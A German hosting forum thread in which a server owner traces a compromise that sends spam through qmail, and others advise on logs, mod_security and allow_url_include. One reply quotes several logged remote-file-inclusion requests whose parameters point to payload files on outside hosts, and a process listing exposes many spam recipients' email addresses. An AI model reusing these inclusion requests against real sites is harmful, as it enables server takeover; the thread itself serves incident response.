Server wird ständig attackiert...

[hypersurf]

Hi,

mein frisch aufgesetzter Server wurde heute schon wieder attaktiert. Gestern war es ein Eggdrop der irgendwie versuchte eine joomla-Seite zu attackieren. Heute wurde mein Server zum Versenden von Spam verwendet.

Der Server ist ein Redhat Enterprise Server mit PLESK 8.5 drauf. Darauf laufen tun im Moment zwei Homepages sowie 3 WBB-Foren (Version 1 & 2). Desweiteren noch ein Teamspeakserver.

Die Angriffe erfolgen immer über den Apache-Server und anscheinend wird immer Perl benutzt. Da ich Perl für meine eigene Programmierung nicht wirklich benötige, würde ich dieses gerne komplett deaktivieren.

Wisst Ihr ob das ohne weiteres geht? Oder hat Plesk irgendwelche Probleme damit? Wenn ja wie deaktiviere ich Perl?

Zumindestens würde ich gerne die Ausführung von Perl-Skripten unter dem Apache-User deaktivieren wenn möglich.

Danke schonmal im Vorraus!


MFG

 

[Mordor]

Naja, das wird vielleicht das Problem lösen, jedoch besteht anscheinend ne grössere Sicherheitslücke, wenn jemand Spam über deinen Server verschicken kann.

 

[hypersurf]

Nach einem Serverneustart werden jetzt wieder Spammails verschickt. Habe schon probiert den sendmail-wrapper (laut Anleitung von Über meinen Server werden Spam's verschickt! - huschi.net) zu erstellen. Leider habe ich auf meinem System keinen sendmail-wrapper.

"find / -name sendmail-wrapper -print" findet nichts.

Wie kriege ich raus, von welchem Prozess die Mails im Moment versendet werden?
Und wie kann ich die Queue von qmail leeren?


Aktuelle Prozesse (qmail ist gestoppt):

[root@km10525-04 sbin]# ps -aux
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1948   664 ?        Ss   18:48   0:00 init [3]      
root     13617  0.0  0.0   1616   572 ?        Ss   18:48   0:02 syslogd -m 0
root     13635  0.0  0.0   5100  1068 ?        Ss   18:48   0:00 /usr/sbin/sshd
root     13660  0.0  0.0   2584   880 ?        Ss   18:48   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root     13755  0.0  0.0   5288   772 ?        S    18:48   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrl
root     13757  0.0  0.0   4132   968 ?        S    18:48   0:00 /usr/sbin/courierlogger imapd
root     13765  0.0  0.0   5288   772 ?        S    18:48   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrl
root     13767  0.0  0.0   4132   968 ?        S    18:48   0:00 /usr/sbin/courierlogger imapd-ssl
root     13773  0.0  0.0   5284   768 ?        S    18:48   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrl
root     13775  0.0  0.0   4132   968 ?        S    18:48   0:00 /usr/sbin/courierlogger pop3d
root     13782  0.0  0.0   5284   768 ?        S    18:48   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrl
root     13784  0.0  0.0   4132   968 ?        S    18:48   0:00 /usr/sbin/courierlogger pop3d-ssl
root     13871  0.0  0.4  34192 13984 ?        Ss   18:48   0:00 /usr/sbin/httpd
named    13913  0.5  0.1  48760  4568 ?        Ssl  18:48   0:24 /usr/sbin/named -u named -c /etc/named.conf -u named -t /var/named/run-root
root     13997  0.0  0.0   2328  1132 ?        S    18:48   0:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/my.cnf --pid-file=/var/run/mysqld/mysqld.
mysql    14040  1.1  0.6 112988 19448 ?        Sl   18:48   0:56 /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --u
apache   14159  0.4  0.4  38468 14940 ?        S    18:48   0:19 /usr/sbin/httpd
apache   14163  0.3  0.4  38200 13800 ?        S    18:48   0:16 /usr/sbin/httpd
root     14182  0.0  0.8  29112 26664 ?        Ss   18:48   0:00 /usr/bin/spamd --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail 
popuser  14191  0.0  0.9  30828 28308 ?        S    18:48   0:02 spamd child
root     14241  0.0  0.2  42044  7100 ?        Ss   18:49   0:00 /usr/local/psa/admin/bin/httpsd
drweb    15402  0.0  0.5  22936 18144 ?        Ss   18:49   0:00 /opt/drweb/drwebd
root     15413  0.0  0.0   3164  1100 ?        Ss   18:49   0:00 crond
root     15423  0.0  0.0   4892   676 ?        Ss   18:49   0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -n 2
root     15425  0.0  0.0   4892   404 ?        S    18:49   0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -n 2
root     15430  0.0  0.2  21480  7832 ?        Ss   18:49   0:00 /usr/local/psa/admin/bin/php /usr/local/psa/admin/bin/modules/watchdog/wdcollect -c /usr/lo
root     15431  0.0  0.0  25536  2492 ?        Ssl  18:49   0:01 /usr/local/psa/admin/bin/modules/watchdog/monit -Ic /usr/local/psa/etc/modules/watchdog/mon
root     16188  0.1  0.0  10112  2832 ?        Ss   18:50   0:05 sshd: root@pts/0 
root     16271  0.0  0.0   2464  1428 pts/0    Ss   18:50   0:00 -bash
apache   19829  0.3  0.4  37332 13224 ?        S    18:54   0:17 /usr/sbin/httpd
root     28358  0.2  0.0 282372  2760 pts/0    SNl  19:12   0:07 ./server_linux -u teamspeak -g users
apache    7555  0.1  0.4  38040 13552 ?        S    19:29   0:04 /usr/sbin/httpd
qmailr   15696  0.0  0.0   1584   512 ?        S    19:39   0:00 qmail-rspawn
psaadm   24128  0.1  0.7  46028 23512 ?        S    19:50   0:01 /usr/local/psa/admin/bin/httpsd
psaadm   24213  0.0  0.6  46948 20260 ?        S    19:50   0:00 /usr/local/psa/admin/bin/httpsd
psaadm   24220  0.0  0.5  44048 16536 ?        S    19:50   0:00 /usr/local/psa/admin/bin/httpsd
qmailr   24572  0.0  0.0   3332   800 ?        S    19:51   0:00 qmail-remote fsmail.net anonymous@meinhost.de brian.gillian.dew@fsmail.net
qmailr   24573  0.0  0.0   4188  1012 ?        S    19:51   0:00 /var/qmail/bin/qmail-remote.moved fsmail.net anonymous@meinhost.de brian.gilli
apache   30551  0.1  0.4  37412 13000 ?        S    20:01   0:00 /usr/sbin/httpd
qmailr   32267  0.0  0.0   1584   416 ?        S    20:04   0:00 qmail-rspawn
qmailr    1930  0.0  0.0   3332   800 ?        S    20:08   0:00 qmail-remote sbcglobal.net anonymous@meinhost.de buciofam@sbcglobal.net
qmailr    1932  0.0  0.0   4188  1012 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved sbcglobal.net anonymous@meinhost.de buciofam
qmailr    1937  0.0  0.0   3332   800 ?        S    20:08   0:00 qmail-remote adelphia.net anonymous@meinhost.de buchanan1740@adelphia.net
qmailr    1938  0.0  0.0   4184  1008 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved adelphia.net anonymous@meinhost.de buchanan1
qmailr    1967  0.0  0.0   3332   804 ?        S    20:08   0:00 qmail-remote aol.com anonymous@meinhost.de buckar002u2@aol.com
qmailr    1968  0.0  0.0   4188  1012 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved aol.com anonymous@meinhost.de buckar002u2@ao
qmailr    1969  0.0  0.0   3328   800 ?        S    20:08   0:00 qmail-remote wmconnect.com anonymous@meinhost.de buckventuresjeff@wmconnect.co
qmailr    1970  0.0  0.0   4184  1008 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved wmconnect.com anonymous@meinhost.de buckvent
qmailr    1971  0.0  0.0   3328   800 ?        S    20:08   0:00 qmail-remote rcn.com anonymous@meinhost.de bud.like313@rcn.com
qmailr    1972  0.0  0.0   4184  1008 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved rcn.com anonymous@meinhost.de bud.like313@rc
qmailr    1973  0.0  0.0   3336   804 ?        S    20:08   0:00 qmail-remote alltel.net anonymous@meinhost.de buckshot1199@alltel.net
qmailr    1974  0.0  0.0   4188  1008 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved alltel.net anonymous@meinhost.de buckshot119
qmailr    1992  0.0  0.0   3332   800 ?        S    20:08   0:00 qmail-remote aol.com anonymous@meinhost.de bucknwolf@aol.com
qmailr    1993  0.0  0.0   4176  1004 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved aol.com anonymous@meinhost.de bucknwolf@aol.
qmailr    2014  0.0  0.0   3340   800 ?        S    20:08   0:00 qmail-remote adelphia.net anonymous@meinhost.de budyzr1@adelphia.net
qmailr    2015  0.0  0.0   4180  1008 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved adelphia.net anonymous@meinhost.de budyzr1@a
qmailr    2017  0.0  0.0   3328   800 ?        S    20:08   0:00 qmail-remote sbcglobal.net anonymous@meinhost.de budwithnature@sbcglobal.net
qmailr    2019  0.0  0.0   4184  1008 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved sbcglobal.net anonymous@meinhost.de budwithn
qmailr    2046  0.0  0.0   3328   800 ?        S    20:08   0:00 qmail-remote aol.com anonymous@meinhost.de buffalochips169@aol.com
qmailr    2047  0.0  0.0   4176  1004 ?        S    20:08   0:00 /var/qmail/bin/qmail-remote.moved aol.com anonymous@meinhost.de buffalochips16
qmailr    3100  0.0  0.0   3328   800 ?        S    20:09   0:00 qmail-remote bellsouth.net anonymous@meinhost.de bugcrazylady@bellsouth.net
qmailr    3109  0.0  0.0   4180  1008 ?        S    20:09   0:00 /var/qmail/bin/qmail-remote.moved bellsouth.net anonymous@meinhost.de bugcrazy
root      3532  0.0  0.0   2064   820 pts/0    R+   20:09   0:00 ps -aux

 

[Mordor]

Starte doch mal qmail und versuche herauszufinden, ob du ein open-relay hast. dazu gibts einiges bei Google. Such dir nen Test dafür, lass ihn durchlaufen, und dann kannst du dich an die Problemlösung machen.

 

[hypersurf]

Hatte ich vorhin schon gemacht. Laut zwei Tests (auch dem der auf Huschi.de verlinkt ist) hab ich keinen.

Kann ich irgendwie herauskriegen, welcher Prozess das ganze verursacht?

 

[Mordor]

Na dann liegt es schon mal nicht am qmail. Dann würde ich mir mal die Apache-logdateien ansehen, ob da was auffälliges drin steht. Denn es könnte gut sein, dass du ein unsicheres Skript am Laufen hast.

 

[redled]

Wenn die Perlscripten über den Apachen includet werden, so kann mod_security
hier ne Menge böser Buben ausperren. Derartige Angriffe beziffern sich bei unserer Domain (phpBB2-Forum) auf etwa 1200 innerhalb von 3 Tagen.
Wenn Dein MTA schon ein Zombi ist, wird das nichts mehr nützen. Allerdings kannst Du
dem Logfile von mod_security wichtige Informationen entnehmen, wo die Bots ansetzen.
Sprich, welche Dateien werden wo bevorzugt includet und wie nennen sich die Ziele.
Foren, Joomla, Wordpress usw. sind beliebte Ziele der Spamer.
Das sieht dann so aus (Quellen unkenntlich gemacht):

GET /wiki/index.php?title=http://amyru.h--x.ru/images/cs.txt? HTTP/1.1
GET //header.php?prefix=http://www.allround---x.org//images/id.txt??? HTTP/1.1
GET /index.php?h=http://64.185.237.3xx/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1
GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://troske--x.com/test.txt?? HTTP/1.1
GET /twiki/tiki-editpage.php?page=http://yoshisho--x.xx.ru/images? HTTP/1.0
GET /index.php?f=69/includes/functions_mod_user.php?phpbb_root_path=http://www.joomla.tea--x.pl/includes/id.txt?? HTTP/1.1
GET /viewtopic.php?t=http://www.sglsys.x-x.net/send.txt? HTTP/1.1

Grob gesagt, suche doch einmal nach Dateien wie: id.txt, cs.txt, test.txt.
Der Inhalt könnte interessant sein =)

Gruss Rico

 

[combie]

Wenn sowas zu Problemen führt:

GET /wiki/index.php?title=http://amyru.h--x.ru/images/cs.txt? HTTP/1.1

Sollte man in der php.ini "allow_url_include" abschalten!
Oder noch besser: Die Scripte auf Vorderman bringen!!

 

[terx`]

Nachträglich Sicherheit einbauen ist auch doof

 

[hypersurf]

allow_url_include ist bereits deaktiviert. Also auch schon vor den Angriffen.

Hmm, die Apache-Log hab' ich studiert. Dort wird immer auf ne id2.txt verwiesen die ich mittlerweile gefunden und entfernt habe. Trotzdem krieg ich diese qmail-Spam-Prozesse nicht weg... HILFE!

 

[combie]

Nachträglich Sicherheit einbauen ist auch doof

Besser spät als gar nicht!

 

[Mordor]

Kannst du nachvollziehen, wo diese txt-Datei her kommt?

 

[redled]

...Dort wird immer auf ne id2.txt verwiesen...

Wo war die genau? Und was steht drin?

 

[hypersurf]

Ein Perlskript was sich mit nem IRC-Netzwerk verbindet. Mit dem Rootkit was bei mir installiert ist, hat das nix zu tun. Da die IRC-Ports aber alle gesperrt sind (per Firewall) funktionieren solche Skripte nicht auf meinem Server.

Letztendlich habe ich gestern als letztes Mittel den /var/qmail/bin-Ordner umbenannt, so dass das Rootkit keine Mails mehr verschicken kann. Meine eigenen Mailadressen habe ich auf einen anderen Server gelegt...

Hat jemand Erfahrungen wie die Erfolgsaussichten einer Strafanzeige bei sowas sind?

 

[combie]

Rootkit

Echt, ein Rootkit...
Wenn man nicht ganz genau weiß, was das Ding alles veranstaltet hat, ist wohl leider eine komplette Neuinstallation des Servers fällig.

 

[hypersurf]

Jo, ne Neuinstallation kommt sowieso nächste Woche.